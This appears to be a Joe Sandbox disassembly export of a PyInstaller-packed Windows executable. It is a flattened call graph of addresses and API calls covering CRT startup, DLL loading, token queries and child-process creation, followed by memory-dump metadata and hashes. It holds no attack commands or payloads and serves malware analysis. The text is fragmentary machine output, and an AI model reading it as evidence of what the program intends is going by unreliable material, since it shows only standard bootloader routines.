20911->20920 20933 7ff6aba4c5c8 20911->20933 20914 7ff6aba4c159 20936 7ff6aba59f50 20914->20936 20920->20910 20921 7ff6aba4c1b5 20920->20921 20923 7ff6aba5aaf1 20922->20923 20924 7ff6aba55e48 _get_daylight 11 API calls 20923->20924 20927 7ff6aba5aaf9 20923->20927 20925 7ff6aba5ab08 20924->20925 20926 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 20925->20926 20926->20927 20927->20908 20929 7ff6aba4c429 20928->20929 20932 7ff6aba4c42e __scrt_acquire_startup_lock 20928->20932 20930 7ff6aba4c6fc 7 API calls 20929->20930 20929->20932 20931 7ff6aba4c4a2 20930->20931 20932->20911 20961 7ff6aba4c58c 20933->20961 20935 7ff6aba4c5d1 20935->20914 20937 7ff6aba59f70 20936->20937 20959 7ff6aba4c165 20936->20959 20938 7ff6aba59f78 20937->20938 20939 7ff6aba59f8e GetModuleFileNameW 20937->20939 20940 7ff6aba55e48 _get_daylight 11 API calls 20938->20940 20943 7ff6aba59fb9 20939->20943 20941 7ff6aba59f7d 20940->20941 20942 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 20941->20942 20942->20959 20944 7ff6aba59ef0 11 API calls 20943->20944 20945 7ff6aba59ff9 20944->20945 20946 7ff6aba5a001 20945->20946 20951 7ff6aba5a019 20945->20951 20947 7ff6aba55e48 _get_daylight 11 API calls 20946->20947 20948 7ff6aba5a006 20947->20948 20949 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20948->20949 20949->20959 20950 7ff6aba5a03b 20952 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20950->20952 20951->20950 20953 7ff6aba5a067 20951->20953 20954 7ff6aba5a080 20951->20954 20952->20959 20955 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20953->20955 20956 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20954->20956 20957 7ff6aba5a070 20955->20957 20956->20950 20958 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20957->20958 20958->20959 20959->20920 20960 7ff6aba4c69c InitializeSListHead 20959->20960 20962 7ff6aba4c5a6 20961->20962 20963 
7ff6aba4c59f 20961->20963 20965 7ff6aba5b16c 20962->20965 20963->20935 20968 7ff6aba5ada8 20965->20968 20975 7ff6aba61548 EnterCriticalSection 20968->20975 16909 7ff6aba4c1fc 16930 7ff6aba4c3dc 16909->16930 16912 7ff6aba4c21d __scrt_acquire_startup_lock 16915 7ff6aba4c35d 16912->16915 16921 7ff6aba4c23b __scrt_release_startup_lock 16912->16921 16913 7ff6aba4c353 17097 7ff6aba4c6fc IsProcessorFeaturePresent 16913->17097 16916 7ff6aba4c6fc 7 API calls 16915->16916 16918 7ff6aba4c368 __FrameHandler3::FrameUnwindToEmptyState 16916->16918 16917 7ff6aba4c260 16919 7ff6aba4c2e6 16938 7ff6aba5a6b8 16919->16938 16921->16917 16921->16919 17086 7ff6aba5aa64 16921->17086 16923 7ff6aba4c2eb 16944 7ff6aba41000 16923->16944 16927 7ff6aba4c30f 16927->16918 17093 7ff6aba4c560 16927->17093 16931 7ff6aba4c3e4 16930->16931 16932 7ff6aba4c3f0 __scrt_dllmain_crt_thread_attach 16931->16932 16933 7ff6aba4c3fd 16932->16933 16934 7ff6aba4c215 16932->16934 17104 7ff6aba5b30c 16933->17104 16934->16912 16934->16913 16939 7ff6aba5a6c8 16938->16939 16942 7ff6aba5a6dd 16938->16942 16939->16942 17147 7ff6aba5a148 16939->17147 16942->16923 16945 7ff6aba42b80 16944->16945 17346 7ff6aba563c0 16945->17346 16947 7ff6aba42bbc 17353 7ff6aba42a70 16947->17353 16951 7ff6aba4bb10 _log10_special 8 API calls 16953 7ff6aba430ec 16951->16953 17091 7ff6aba4c84c GetModuleHandleW 16953->17091 16954 7ff6aba42bfd 17520 7ff6aba41c60 16954->17520 16955 7ff6aba42cdb 17529 7ff6aba439d0 16955->17529 16959 7ff6aba42c1c 17425 7ff6aba47e70 16959->17425 16960 7ff6aba42d2a 17552 7ff6aba41e50 16960->17552 16964 7ff6aba42c4f 16971 7ff6aba42c7b __std_exception_copy 16964->16971 17524 7ff6aba47fe0 16964->17524 16965 7ff6aba42d1d 16966 7ff6aba42d45 16965->16966 16967 7ff6aba42d22 16965->16967 16970 7ff6aba41c60 49 API calls 16966->16970 17548 7ff6aba4f5a4 16967->17548 16972 7ff6aba42d64 16970->16972 16973 7ff6aba47e70 14 API calls 16971->16973 16981 7ff6aba42c9e __std_exception_copy 16971->16981 16976 7ff6aba41930 115 API calls 
16972->16976 16973->16981 16974 7ff6aba47f80 40 API calls 16975 7ff6aba42dcc 16974->16975 16977 7ff6aba47fe0 40 API calls 16975->16977 16978 7ff6aba42d8e 16976->16978 16979 7ff6aba42dd8 16977->16979 16978->16959 16980 7ff6aba42d9e 16978->16980 16982 7ff6aba47fe0 40 API calls 16979->16982 16983 7ff6aba41e50 81 API calls 16980->16983 16981->16974 16986 7ff6aba42cce __std_exception_copy 16981->16986 16984 7ff6aba42de4 16982->16984 17076 7ff6aba42bc9 __std_exception_copy 16983->17076 16985 7ff6aba47fe0 40 API calls 16984->16985 16985->16986 16987 7ff6aba47e70 14 API calls 16986->16987 16988 7ff6aba42e04 16987->16988 16989 7ff6aba42ef9 16988->16989 16990 7ff6aba42e29 __std_exception_copy 16988->16990 16991 7ff6aba41e50 81 API calls 16989->16991 17001 7ff6aba42e6c 16990->17001 17438 7ff6aba47f80 16990->17438 16991->17076 16993 7ff6aba4303a 16996 7ff6aba47e70 14 API calls 16993->16996 16994 7ff6aba43033 17563 7ff6aba485b0 16994->17563 16998 7ff6aba4304f __std_exception_copy 16996->16998 16999 7ff6aba43187 16998->16999 17000 7ff6aba4308a 16998->17000 17570 7ff6aba438f0 16999->17570 17002 7ff6aba4311a 17000->17002 17003 7ff6aba43094 17000->17003 17001->16993 17001->16994 17007 7ff6aba47e70 14 API calls 17002->17007 17445 7ff6aba485c0 17003->17445 17005 7ff6aba43195 17009 7ff6aba431b7 17005->17009 17010 7ff6aba431ab 17005->17010 17008 7ff6aba43126 17007->17008 17012 7ff6aba430a5 17008->17012 17015 7ff6aba43133 17008->17015 17014 7ff6aba41c60 49 API calls 17009->17014 17573 7ff6aba43a40 17010->17573 17017 7ff6aba41e50 81 API calls 17012->17017 17024 7ff6aba4310e __std_exception_copy 17014->17024 17018 7ff6aba41c60 49 API calls 17015->17018 17017->17076 17021 7ff6aba43151 17018->17021 17019 7ff6aba4320a 17495 7ff6aba48950 17019->17495 17023 7ff6aba43158 17021->17023 17021->17024 17027 7ff6aba41e50 81 API calls 17023->17027 17024->17019 17025 7ff6aba431ed SetDllDirectoryW LoadLibraryExW 17024->17025 17025->17019 17026 7ff6aba4321d SetDllDirectoryW 17029 7ff6aba43250 
17026->17029 17074 7ff6aba432a1 17026->17074 17027->17076 17030 7ff6aba47e70 14 API calls 17029->17030 17038 7ff6aba4325c __std_exception_copy 17030->17038 17031 7ff6aba43433 17032 7ff6aba4343e 17031->17032 17039 7ff6aba43445 17031->17039 17034 7ff6aba485b0 5 API calls 17032->17034 17033 7ff6aba43362 17500 7ff6aba42780 17033->17500 17036 7ff6aba43443 17034->17036 17036->17039 17041 7ff6aba43339 17038->17041 17045 7ff6aba43295 17038->17045 17650 7ff6aba42720 17039->17650 17044 7ff6aba47f80 40 API calls 17041->17044 17044->17074 17045->17074 17576 7ff6aba46200 17045->17576 17074->17031 17074->17033 17076->16951 17087 7ff6aba5aa7b 17086->17087 17088 7ff6aba5aa9c 17086->17088 17087->16919 19826 7ff6aba5b358 17088->19826 17092 7ff6aba4c85d 17091->17092 17092->16927 17095 7ff6aba4c571 17093->17095 17094 7ff6aba4c326 17094->16917 17095->17094 17096 7ff6aba4ce18 7 API calls 17095->17096 17096->17094 17098 7ff6aba4c722 _isindst memcpy_s 17097->17098 17099 7ff6aba4c741 RtlCaptureContext RtlLookupFunctionEntry 17098->17099 17100 7ff6aba4c76a RtlVirtualUnwind 17099->17100 17101 7ff6aba4c7a6 memcpy_s 17099->17101 17100->17101 17102 7ff6aba4c7d8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17101->17102 17103 7ff6aba4c826 _isindst 17102->17103 17103->16915 17105 7ff6aba6471c 17104->17105 17106 7ff6aba4c402 17105->17106 17114 7ff6aba5d420 17105->17114 17106->16934 17108 7ff6aba4ce18 17106->17108 17109 7ff6aba4ce2a 17108->17109 17110 7ff6aba4ce20 17108->17110 17109->16934 17126 7ff6aba4d1b4 17110->17126 17125 7ff6aba61548 EnterCriticalSection 17114->17125 17127 7ff6aba4d1c3 17126->17127 17128 7ff6aba4ce25 17126->17128 17134 7ff6aba4d3f0 17127->17134 17130 7ff6aba4d220 17128->17130 17131 7ff6aba4d24b 17130->17131 17132 7ff6aba4d22e DeleteCriticalSection 17131->17132 17133 7ff6aba4d24f 17131->17133 17132->17131 17133->17109 17138 7ff6aba4d258 17134->17138 17139 7ff6aba4d342 TlsFree 17138->17139 17144 7ff6aba4d29c __vcrt_InitializeCriticalSectionEx 
17138->17144 17140 7ff6aba4d2ca LoadLibraryExW 17142 7ff6aba4d2eb GetLastError 17140->17142 17143 7ff6aba4d369 17140->17143 17141 7ff6aba4d389 GetProcAddress 17141->17139 17142->17144 17143->17141 17145 7ff6aba4d380 FreeLibrary 17143->17145 17144->17139 17144->17140 17144->17141 17146 7ff6aba4d30d LoadLibraryExW 17144->17146 17145->17141 17146->17143 17146->17144 17148 7ff6aba5a161 17147->17148 17155 7ff6aba5a15d 17147->17155 17168 7ff6aba63cac GetEnvironmentStringsW 17148->17168 17151 7ff6aba5a17a 17181 7ff6aba5a2c8 17151->17181 17152 7ff6aba5a16e 17175 7ff6aba5b464 17152->17175 17155->16942 17160 7ff6aba5a508 17155->17160 17157 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17158 7ff6aba5a1a1 17157->17158 17159 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17158->17159 17159->17155 17161 7ff6aba5a52b 17160->17161 17166 7ff6aba5a542 17160->17166 17161->16942 17162 7ff6aba5fe04 _get_daylight 11 API calls 17162->17166 17163 7ff6aba5a5b6 17165 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17163->17165 17164 7ff6aba60b10 MultiByteToWideChar _fread_nolock 17164->17166 17165->17161 17166->17161 17166->17162 17166->17163 17166->17164 17167 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17166->17167 17167->17166 17169 7ff6aba5a166 17168->17169 17170 7ff6aba63cd0 17168->17170 17169->17151 17169->17152 17200 7ff6aba5e6c4 17170->17200 17172 7ff6aba63d07 memcpy_s 17173 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17172->17173 17174 7ff6aba63d27 FreeEnvironmentStringsW 17173->17174 17174->17169 17176 7ff6aba5b469 RtlFreeHeap 17175->17176 17177 7ff6aba5b498 17175->17177 17176->17177 17178 7ff6aba5b484 GetLastError 17176->17178 17177->17155 17179 7ff6aba5b491 Concurrency::details::SchedulerProxy::DeleteThis 17178->17179 17180 7ff6aba55e48 _get_daylight 9 API calls 17179->17180 17180->17177 17182 7ff6aba5a2f0 17181->17182 17183 
7ff6aba5fe04 _get_daylight 11 API calls 17182->17183 17195 7ff6aba5a32b 17183->17195 17184 7ff6aba5a333 17185 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17184->17185 17187 7ff6aba5a182 17185->17187 17186 7ff6aba5a3ad 17188 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17186->17188 17187->17157 17188->17187 17189 7ff6aba5fe04 _get_daylight 11 API calls 17189->17195 17190 7ff6aba5a39c 17271 7ff6aba5a3e4 17190->17271 17194 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17194->17184 17195->17184 17195->17186 17195->17189 17195->17190 17196 7ff6aba5a3d0 17195->17196 17198 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17195->17198 17262 7ff6aba616e4 17195->17262 17277 7ff6aba5b844 IsProcessorFeaturePresent 17196->17277 17198->17195 17201 7ff6aba5e70f 17200->17201 17205 7ff6aba5e6d3 _get_daylight 17200->17205 17210 7ff6aba55e48 17201->17210 17203 7ff6aba5e6f6 HeapAlloc 17204 7ff6aba5e70d 17203->17204 17203->17205 17204->17172 17205->17201 17205->17203 17207 7ff6aba64800 17205->17207 17213 7ff6aba64840 17207->17213 17219 7ff6aba5c1c8 GetLastError 17210->17219 17212 7ff6aba55e51 17212->17204 17218 7ff6aba61548 EnterCriticalSection 17213->17218 17220 7ff6aba5c209 FlsSetValue 17219->17220 17223 7ff6aba5c1ec 17219->17223 17221 7ff6aba5c21b 17220->17221 17222 7ff6aba5c1f9 SetLastError 17220->17222 17236 7ff6aba5fe04 17221->17236 17222->17212 17223->17220 17223->17222 17227 7ff6aba5c248 FlsSetValue 17230 7ff6aba5c266 17227->17230 17231 7ff6aba5c254 FlsSetValue 17227->17231 17228 7ff6aba5c238 FlsSetValue 17229 7ff6aba5c241 17228->17229 17232 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 17229->17232 17243 7ff6aba5bdfc 17230->17243 17231->17229 17232->17222 17241 7ff6aba5fe15 _get_daylight 17236->17241 17237 7ff6aba5fe66 17240 7ff6aba55e48 _get_daylight 10 API calls 17237->17240 17238 7ff6aba5fe4a HeapAlloc 17239 7ff6aba5c22a 
17238->17239 17238->17241 17239->17227 17239->17228 17240->17239 17241->17237 17241->17238 17242 7ff6aba64800 _get_daylight 2 API calls 17241->17242 17242->17241 17248 7ff6aba5bcd4 17243->17248 17260 7ff6aba61548 EnterCriticalSection 17248->17260 17263 7ff6aba616fb 17262->17263 17264 7ff6aba616f1 17262->17264 17265 7ff6aba55e48 _get_daylight 11 API calls 17263->17265 17264->17263 17269 7ff6aba61717 17264->17269 17266 7ff6aba61703 17265->17266 17281 7ff6aba5b824 17266->17281 17268 7ff6aba6170f 17268->17195 17269->17268 17270 7ff6aba55e48 _get_daylight 11 API calls 17269->17270 17270->17266 17275 7ff6aba5a3e9 17271->17275 17276 7ff6aba5a3a4 17271->17276 17272 7ff6aba5a412 17274 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17272->17274 17273 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17273->17275 17274->17276 17275->17272 17275->17273 17276->17194 17278 7ff6aba5b857 17277->17278 17324 7ff6aba5b558 17278->17324 17284 7ff6aba5b6bc 17281->17284 17283 7ff6aba5b83d 17283->17268 17285 7ff6aba5b6e7 17284->17285 17288 7ff6aba5b758 17285->17288 17287 7ff6aba5b70e 17287->17283 17298 7ff6aba5b4a0 17288->17298 17293 7ff6aba5b793 17293->17287 17294 7ff6aba5b844 _isindst 17 API calls 17295 7ff6aba5b823 17294->17295 17296 7ff6aba5b6bc _invalid_parameter_noinfo 37 API calls 17295->17296 17297 7ff6aba5b83d 17296->17297 17297->17287 17299 7ff6aba5b4bc GetLastError 17298->17299 17300 7ff6aba5b4f7 17298->17300 17301 7ff6aba5b4cc 17299->17301 17300->17293 17304 7ff6aba5b50c 17300->17304 17307 7ff6aba5c290 17301->17307 17305 7ff6aba5b528 GetLastError SetLastError 17304->17305 17306 7ff6aba5b540 17304->17306 17305->17306 17306->17293 17306->17294 17308 7ff6aba5c2ca FlsSetValue 17307->17308 17309 7ff6aba5c2af FlsGetValue 17307->17309 17310 7ff6aba5c2d7 17308->17310 17312 7ff6aba5b4e7 SetLastError 17308->17312 17311 7ff6aba5c2c4 17309->17311 17309->17312 17313 7ff6aba5fe04 _get_daylight 11 API calls 17310->17313 17311->17308 
17312->17300 17314 7ff6aba5c2e6 17313->17314 17315 7ff6aba5c304 FlsSetValue 17314->17315 17316 7ff6aba5c2f4 FlsSetValue 17314->17316 17318 7ff6aba5c322 17315->17318 17319 7ff6aba5c310 FlsSetValue 17315->17319 17317 7ff6aba5c2fd 17316->17317 17320 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17317->17320 17321 7ff6aba5bdfc _get_daylight 11 API calls 17318->17321 17319->17317 17320->17312 17322 7ff6aba5c32a 17321->17322 17323 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17322->17323 17323->17312 17325 7ff6aba5b592 _isindst memcpy_s 17324->17325 17326 7ff6aba5b5ba RtlCaptureContext RtlLookupFunctionEntry 17325->17326 17327 7ff6aba5b62a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17326->17327 17328 7ff6aba5b5f4 RtlVirtualUnwind 17326->17328 17331 7ff6aba5b67c _isindst 17327->17331 17328->17327 17332 7ff6aba4bb10 17331->17332 17333 7ff6aba4bb19 17332->17333 17334 7ff6aba4bea0 IsProcessorFeaturePresent 17333->17334 17335 7ff6aba4bb24 GetCurrentProcess TerminateProcess 17333->17335 17336 7ff6aba4beb8 17334->17336 17341 7ff6aba4c098 RtlCaptureContext 17336->17341 17342 7ff6aba4c0b2 RtlLookupFunctionEntry 17341->17342 17343 7ff6aba4c0c8 RtlVirtualUnwind 17342->17343 17344 7ff6aba4becb 17342->17344 17343->17342 17343->17344 17345 7ff6aba4be60 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17344->17345 17349 7ff6aba606f0 17346->17349 17347 7ff6aba60743 17348 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 17347->17348 17350 7ff6aba6076c 17348->17350 17349->17347 17351 7ff6aba60796 17349->17351 17350->16947 17663 7ff6aba605c8 17351->17663 17671 7ff6aba4be10 17353->17671 17356 7ff6aba42aab GetLastError 17678 7ff6aba42310 17356->17678 17357 7ff6aba42ad0 17673 7ff6aba48840 FindFirstFileExW 17357->17673 17361 7ff6aba42b3d 17708 7ff6aba48a00 17361->17708 17362 7ff6aba42ae3 17695 7ff6aba488c0 CreateFileW 17362->17695 17364 7ff6aba4bb10 _log10_special 8 
API calls 17366 7ff6aba42b75 17364->17366 17366->17076 17375 7ff6aba41930 17366->17375 17368 7ff6aba42b0c __vcrt_InitializeCriticalSectionEx 17368->17361 17369 7ff6aba42af4 17698 7ff6aba41f30 17369->17698 17370 7ff6aba42b4b 17371 7ff6aba42ac6 17370->17371 17373 7ff6aba41f30 78 API calls 17370->17373 17371->17364 17373->17371 17376 7ff6aba439d0 108 API calls 17375->17376 17377 7ff6aba41965 17376->17377 17378 7ff6aba41c23 17377->17378 17379 7ff6aba473d0 83 API calls 17377->17379 17380 7ff6aba4bb10 _log10_special 8 API calls 17378->17380 17381 7ff6aba419ab 17379->17381 17382 7ff6aba41c3e 17380->17382 17424 7ff6aba419e3 17381->17424 18122 7ff6aba4fc2c 17381->18122 17382->16954 17382->16955 17384 7ff6aba4f5a4 74 API calls 17384->17378 17385 7ff6aba419c5 17386 7ff6aba419c9 17385->17386 17387 7ff6aba419e8 17385->17387 17388 7ff6aba55e48 _get_daylight 11 API calls 17386->17388 18126 7ff6aba4f8f4 17387->18126 17390 7ff6aba419ce 17388->17390 18129 7ff6aba42020 17390->18129 17393 7ff6aba41a06 17395 7ff6aba55e48 _get_daylight 11 API calls 17393->17395 17394 7ff6aba41a25 17398 7ff6aba41a3c 17394->17398 17399 7ff6aba41a5b 17394->17399 17396 7ff6aba41a0b 17395->17396 17397 7ff6aba42020 87 API calls 17396->17397 17397->17424 17400 7ff6aba55e48 _get_daylight 11 API calls 17398->17400 17401 7ff6aba41c60 49 API calls 17399->17401 17402 7ff6aba41a41 17400->17402 17403 7ff6aba41a72 17401->17403 17404 7ff6aba42020 87 API calls 17402->17404 17405 7ff6aba41c60 49 API calls 17403->17405 17404->17424 17406 7ff6aba41abd 17405->17406 17407 7ff6aba4fc2c 73 API calls 17406->17407 17408 7ff6aba41ae1 17407->17408 17409 7ff6aba41af6 17408->17409 17410 7ff6aba41b15 17408->17410 17411 7ff6aba55e48 _get_daylight 11 API calls 17409->17411 17412 7ff6aba4f8f4 _fread_nolock 53 API calls 17410->17412 17413 7ff6aba41afb 17411->17413 17414 7ff6aba41b2a 17412->17414 17415 7ff6aba42020 87 API calls 17413->17415 17416 7ff6aba41b30 17414->17416 17417 7ff6aba41b4f 17414->17417 17415->17424 17419 7ff6aba55e48 
_get_daylight 11 API calls 17416->17419 18144 7ff6aba4f668 17417->18144 17421 7ff6aba41b35 17419->17421 17422 7ff6aba42020 87 API calls 17421->17422 17422->17424 17423 7ff6aba41e50 81 API calls 17423->17424 17424->17384 17426 7ff6aba47e7a 17425->17426 17427 7ff6aba48950 2 API calls 17426->17427 17428 7ff6aba47e99 GetEnvironmentVariableW 17427->17428 17429 7ff6aba47eb6 ExpandEnvironmentStringsW 17428->17429 17430 7ff6aba47f02 17428->17430 17429->17430 17431 7ff6aba47ed8 17429->17431 17432 7ff6aba4bb10 _log10_special 8 API calls 17430->17432 17434 7ff6aba48a00 2 API calls 17431->17434 17433 7ff6aba47f14 17432->17433 17433->16964 17435 7ff6aba47eea 17434->17435 17436 7ff6aba4bb10 _log10_special 8 API calls 17435->17436 17437 7ff6aba47efa 17436->17437 17437->16964 17439 7ff6aba48950 2 API calls 17438->17439 17440 7ff6aba47f9c 17439->17440 17441 7ff6aba48950 2 API calls 17440->17441 17442 7ff6aba47fac 17441->17442 18408 7ff6aba59174 17442->18408 17444 7ff6aba47fba __std_exception_copy 17444->17001 17446 7ff6aba485d5 17445->17446 18426 7ff6aba47bb0 GetCurrentProcess OpenProcessToken 17446->18426 17449 7ff6aba47bb0 7 API calls 17450 7ff6aba48601 17449->17450 17451 7ff6aba4861a 17450->17451 17452 7ff6aba48634 17450->17452 17454 7ff6aba41d50 48 API calls 17451->17454 17453 7ff6aba41d50 48 API calls 17452->17453 17455 7ff6aba48647 LocalFree LocalFree 17453->17455 17456 7ff6aba48632 17454->17456 17457 7ff6aba48663 17455->17457 17459 7ff6aba4866f 17455->17459 17456->17455 18436 7ff6aba42220 17457->18436 17460 7ff6aba4bb10 _log10_special 8 API calls 17459->17460 17461 7ff6aba43099 17460->17461 17461->17012 17462 7ff6aba47ca0 17461->17462 17463 7ff6aba47cb8 17462->17463 17464 7ff6aba47cdc 17463->17464 17465 7ff6aba47d3a GetTempPathW GetCurrentProcessId 17463->17465 17466 7ff6aba47e70 14 API calls 17464->17466 18447 7ff6aba48760 17465->18447 17468 7ff6aba47ce8 17466->17468 18454 7ff6aba47610 17468->18454 17474 7ff6aba47d68 __std_exception_copy 17482 7ff6aba47da5 
__std_exception_copy 17474->17482 18451 7ff6aba59aa4 17474->18451 17496 7ff6aba48972 MultiByteToWideChar 17495->17496 17497 7ff6aba48996 17495->17497 17496->17497 17499 7ff6aba489ac __std_exception_copy 17496->17499 17498 7ff6aba489b3 MultiByteToWideChar 17497->17498 17497->17499 17498->17499 17499->17026 17512 7ff6aba4278e memcpy_s 17500->17512 17501 7ff6aba4bb10 _log10_special 8 API calls 17502 7ff6aba42a24 17501->17502 17502->17076 17519 7ff6aba48590 LocalFree 17502->17519 17503 7ff6aba42987 17503->17501 17505 7ff6aba41c60 49 API calls 17505->17512 17506 7ff6aba429a2 17508 7ff6aba41e50 81 API calls 17506->17508 17508->17503 17511 7ff6aba42989 17514 7ff6aba41e50 81 API calls 17511->17514 17512->17503 17512->17505 17512->17506 17512->17511 17513 7ff6aba42140 81 API calls 17512->17513 17517 7ff6aba42990 17512->17517 18718 7ff6aba43970 17512->18718 18724 7ff6aba47260 17512->18724 18735 7ff6aba415e0 17512->18735 18783 7ff6aba46560 17512->18783 18787 7ff6aba435a0 17512->18787 18831 7ff6aba43860 17512->18831 17513->17512 17514->17503 17518 7ff6aba41e50 81 API calls 17517->17518 17518->17503 17521 7ff6aba41c85 17520->17521 17522 7ff6aba558c4 49 API calls 17521->17522 17523 7ff6aba41ca8 17522->17523 17523->16959 17525 7ff6aba48950 2 API calls 17524->17525 17526 7ff6aba47ff4 17525->17526 17527 7ff6aba59174 38 API calls 17526->17527 17528 7ff6aba48006 __std_exception_copy 17527->17528 17528->16971 17530 7ff6aba439dc 17529->17530 17531 7ff6aba48950 2 API calls 17530->17531 17532 7ff6aba43a04 17531->17532 17533 7ff6aba48950 2 API calls 17532->17533 17534 7ff6aba43a17 17533->17534 19014 7ff6aba56f54 17534->19014 17537 7ff6aba4bb10 _log10_special 8 API calls 17538 7ff6aba42ceb 17537->17538 17538->16960 17539 7ff6aba473d0 17538->17539 17540 7ff6aba473f4 17539->17540 17541 7ff6aba4fc2c 73 API calls 17540->17541 17546 7ff6aba474cb __std_exception_copy 17540->17546 17542 7ff6aba47410 17541->17542 17542->17546 19405 7ff6aba58804 17542->19405 17544 7ff6aba4fc2c 73 API calls 17547 
7ff6aba47425 17544->17547 17545 7ff6aba4f8f4 _fread_nolock 53 API calls 17545->17547 17546->16965 17547->17544 17547->17545 17547->17546 17549 7ff6aba4f5d4 17548->17549 19420 7ff6aba4f380 17549->19420 17551 7ff6aba4f5ed 17551->16960 17553 7ff6aba4be10 17552->17553 17554 7ff6aba41e74 GetCurrentProcessId 17553->17554 17555 7ff6aba41c60 49 API calls 17554->17555 17556 7ff6aba41ec5 17555->17556 17557 7ff6aba558c4 49 API calls 17556->17557 17558 7ff6aba41f02 17557->17558 17559 7ff6aba41cc0 80 API calls 17558->17559 17560 7ff6aba41f0c 17559->17560 17561 7ff6aba4bb10 _log10_special 8 API calls 17560->17561 17562 7ff6aba41f1c 17561->17562 17562->17076 17564 7ff6aba48510 GetConsoleWindow 17563->17564 17565 7ff6aba4852a GetCurrentProcessId GetWindowThreadProcessId 17564->17565 17566 7ff6aba43038 17564->17566 17565->17566 17567 7ff6aba48549 17565->17567 17566->16993 17567->17566 17568 7ff6aba48551 ShowWindow 17567->17568 17568->17566 17569 7ff6aba48560 Sleep 17568->17569 17569->17566 17569->17568 17571 7ff6aba41c60 49 API calls 17570->17571 17572 7ff6aba4390d 17571->17572 17572->17005 17574 7ff6aba41c60 49 API calls 17573->17574 17575 7ff6aba43a70 17574->17575 17575->17024 17577 7ff6aba46215 17576->17577 17578 7ff6aba432b3 17577->17578 17579 7ff6aba55e48 _get_daylight 11 API calls 17577->17579 17582 7ff6aba46780 17578->17582 17580 7ff6aba46222 17579->17580 17581 7ff6aba42020 87 API calls 17580->17581 17581->17578 19431 7ff6aba41450 17582->19431 19537 7ff6aba457a0 17650->19537 17670 7ff6aba562dc EnterCriticalSection 17663->17670 17672 7ff6aba42a7c GetModuleFileNameW 17671->17672 17672->17356 17672->17357 17674 7ff6aba4887f FindClose 17673->17674 17675 7ff6aba48892 17673->17675 17674->17675 17676 7ff6aba4bb10 _log10_special 8 API calls 17675->17676 17677 7ff6aba42ada 17676->17677 17677->17361 17677->17362 17679 7ff6aba4be10 17678->17679 17680 7ff6aba42330 GetCurrentProcessId 17679->17680 17713 7ff6aba41d50 17680->17713 17682 7ff6aba4237b 17717 7ff6aba55b18 17682->17717 17685 
Control-flow Graph
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLastMessage$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                                        • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                                        • API String ID: 4208240515-3165540532
                                                                                                                                                                                                                                                        • Opcode ID: 40a2b2c96db5062fbaff54aa02804a1320958b809a954de9be60782f8870c354
                                                                                                                                                                                                                                                        • Instruction ID: e6eb9e40ad4aec229f224fa371cd70f33f5e29aed7557db529e0e92e7d22ebb3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 40a2b2c96db5062fbaff54aa02804a1320958b809a954de9be60782f8870c354
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3D15772A0AB8296EB109F78E8642AD3760FF48B98F404235DB5D97AB4EF3CD155C740

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6ABA66EB5
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA66808: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6ABA6681C
